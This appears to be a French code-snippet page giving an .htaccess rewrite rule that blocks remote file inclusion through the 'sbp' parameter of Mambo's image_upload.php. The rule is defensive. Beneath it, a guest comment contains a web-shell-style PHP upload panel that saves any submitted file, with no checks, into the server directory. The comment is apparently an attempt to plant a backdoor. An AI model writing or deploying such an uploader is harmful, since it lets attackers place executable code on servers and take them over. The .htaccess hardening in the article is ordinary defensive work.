Corriger la faille touchant mambo via image_upload.php

Information

Le CMS mambo peut être victime d'attaque par inclusion de fichiers externes.

La prise de contrôle de votre site en est le but ultime.

Le script concerné est image_upload.php avec un paramèyre sbp.

Cette petite règle dans le fichier .htaccess vous protégera car il renverra un code 403 (accès interdit) aux hackers.

code source classé dans .HTACCESS ANTI HACK

01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16

                               
                            /*
    Titre : Corriger la faille touchant mambo via image_upload.php                                                        
                                                                                                                          
    URL   : https://phpsources.net/code_s.php?id=784
    Auteur           : Forty                                                                                              
    Website auteur   : http://www.toplien.fr/                                                                             
    Date édition     : 15 Juin 2008                                                                                      
    Date mise a jour : 18 Aout 2019
                                                                                      
    Rapport de la maj:                                                                                                    
    - fonctionnement du code vérifié                                                                                
*/
/*---------------------------------------------------------------*/?>
RewriteCond %{QUERY_STRING} ^(.*&)?sbp=http://
RewriteRule ^(.*/)?components/com_simpleboard/image_upload\.php$ - [F,L]

Un petit merci aux auteurs pour leur travail, ça ne coûte rien et ça fait toujours plaisir

[1]

Invité
28 Fév 2015 à 01:37
<head>

<style>



</style>

</head>

<table style="BORDER-COLLAPSE: collapse" cellspacing="0" bordercolordark="#666666" cellpadding="5" height="1" width="100%" bgcolor="#000000" bordercolorlight="#c0c0c0" border="1">

<tr>

<a bookmark="minipanel" style="font-weight: normal; color: #009900; font-family: verdana; text-decoration: none">

<td width="50%" height="1" valign="top" style="font-family: verdana; color: #d9d9d9; font-size: 11px">

<center>Upload<form method="POST" enctype="multipart/form-data">

<input type="hidden" name="act" value="upload" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900">

<input type="file" name="userfile" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900"><input type="hidden" name="miniform" value="1" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900">

<input type="submit" name="submit" value="Upload" style="font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666; background-color: #009900"><br><br>

<?php

$uploaddir = "";

$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);

if (isset($_FILES['userfile']['name'])) {

if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {

echo "The file ". basename($_FILES['userfile']['name']) ." has been uploaded";

} else {

echo "There was an error uploading the file. please try again!";

}

}

?>

</form>

</center></td>

</tr>

</table>

</a>